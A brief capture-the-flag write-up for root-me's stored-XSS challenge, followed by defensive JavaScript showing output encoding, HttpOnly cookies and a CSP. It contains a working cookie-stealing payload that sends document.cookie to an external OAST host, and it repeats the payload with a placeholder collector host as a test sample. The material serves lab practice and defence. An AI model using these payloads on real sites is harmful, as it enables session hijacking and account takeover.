XSS stored 1
root-me challenge XSS - Stored 1: Steal the administrator session cookie and use it to validate the challenge.
Using app.interactsh.com, any title and message work; swap the src URL for whichever OAST app is in use:
<script>document.write("<img src='https://cgn1cqt2vtc0000xbc8ggekoscryyyyyb.oast.fun?="+document.cookie+"'></img>");</script>
Techniques
Counter moves
XSS stored 1 is the variant in play. A client-side finding still needs a server-side control behind it. Defenders’ notes on this are under the application layer as a target.
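The server-side controls that answer the payload above, as an added example that is not part of the original notes: output encoding for the stored message, an HttpOnly session cookie, and a CSP that blocks inline script and off-origin image loads. The function names, the cookie name `session` and the host `collector.example` are assumptions made for illustration.

```javascript
// Added example: server-side controls for a stored-XSS cookie-theft payload.
// Function names and the sample post are constructed for illustration.

// Encode the five HTML-significant characters before stored text reaches a page.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Render one stored post; title and message are both untrusted input.
function renderPost(post) {
  return `<article><h2>${escapeHtml(post.title)}</h2><p>${escapeHtml(post.message)}</p></article>`;
}

// Session cookie that page script cannot read (HttpOnly) and that only travels over TLS.
function sessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; HttpOnly; Secure; SameSite=Strict; Path=/`;
}

// Response headers: the CSP refuses inline script and limits image loads to the
// same origin, so an injected <img> cannot carry data to another host.
function securityHeaders(sessionId) {
  return {
    "Content-Security-Policy":
      "default-src 'self'; script-src 'self'; img-src 'self'; object-src 'none'; base-uri 'none'",
    "X-Content-Type-Options": "nosniff",
    "Set-Cookie": sessionCookie("session", sessionId),
  };
}

// Constructed sample: a post shaped like the payload above, with a placeholder host.
const samplePost = {
  title: "hello",
  message: `<script>document.write("<img src='https://collector.example/?c="+document.cookie+"'>");</script>`,
};

const html = renderPost(samplePost);
const headers = securityHeaders("constructed-session-id");
console.log(html);    // the message is shown as text, no live <script> element
console.log(headers);
```

Each control covers a different failure: encoding stops the script from running, HttpOnly keeps the session value out of `document.cookie` if encoding is missed somewhere, and the CSP limits where an injected element can send data.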